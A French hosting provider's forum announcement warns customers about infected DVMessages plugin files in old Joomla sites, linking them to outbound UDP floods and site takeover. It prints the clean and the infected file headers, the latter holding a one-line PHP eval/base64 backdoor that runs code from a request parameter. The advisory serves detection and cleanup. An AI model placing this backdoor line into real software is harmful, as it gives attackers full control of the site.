Faille de sécurité dans l'extension DVMessages du CMS Joomla 1.x à 2.5

Les annonces officielles de FranceServ Hébergement.
Répondre
Avatar de l’utilisateur
Elodie
Fondatrice / Responsable
Fondatrice / Responsable
Messages : 7938
Inscription : 2 avril 2010 à 20:14

Bonjour,

Je vois de plus en plus des attaques par flood UDP sortant de certains sites des hébergés de la plateforme de FranceServ Hébergement. Ces attaques sortantes sont bien entendue bloquées mais elles créent une charge inutile supplémentaire au service et incite des robots malveillants à inonder ces sites vérolés de requêtes abusives en les répertoriant par la même occasion.

Cette faille de sécurité est présente dans l'extension DVMessages du CMS Joomla, apparemment à la version 1.5 et probablement supérieure. Ce qui est sûr, c'est qu'à partir de Joomla 2.5 ce problème est corrigé étant donné que cette extension a été abandonnée à partir de cette version (http://extensions.joomla.org/extensions ... ames/10999).

Le fichier original de cette extension commence par les lignes suivantes :

Code : Tout sélectionner

<?php
// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );
jimport( 'joomla.plugin.plugin' );
alors que lorsque cette extension est infectée, le fichier commence par ces lignes :

Code : Tout sélectionner

<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );
Ce fichier est généralement présent à ces emplacements :

/plugins/system/dvmessages.php
/plugins/system/dvmessages/dvmessages.php

On remarque que le die de sécurité qui bloque la connexion lorsqu'il y a tentative d'intrusion a été remplacé par l'exécution d'un paramètre dans la requêtes. N'importe qui peut alors exécuter n'importe quoi, supprimer ou modifier le site entièrement, envoyer du phishing à l'intérieur, des scripts PHP d'attaques, en un mot, prendre le contrôle total du site.

Cette faille de sécurité est évoquée dans le forum officiel de Joomla en anglais : http://forum.joomla.org/viewtopic.php?f=621&t=791651 ayant pour titre : "dvmessages.php is being reported as phishing file?"

Les hébergeurs des personnes concernées dans ce fil de discussion lancent des alertes aux hébergés, leur demandant de corriger la situation, ce que je fais présentement car la situation se dégrade.

La version 1.5 de Joomla est maintenant trop âgées et semble de plus en plus vulnérable, il faut impérativement mettre à jour vos solutions. Dans un premier temps, désactivez cette extension et sauvegardez vos données avant de mettre à jour votre Joomla à la dernière version.

Les sites des hébergés infectés par cette faille de sécurité et détectés par mes robots de protections, seront mis hors ligne et son propriétaire sera informé de la raison à l'aide de cette annonce.
Vous avez une question ? Posez-la de préférence sur le forum et si ça demande un contact plus instantané, n'hésitez pas à vous rendre sur le t'chat IRC. Si votre question est personnelle, contactez-nous directement.
Haut
Répondre

Revenir à « Annonces et actualités »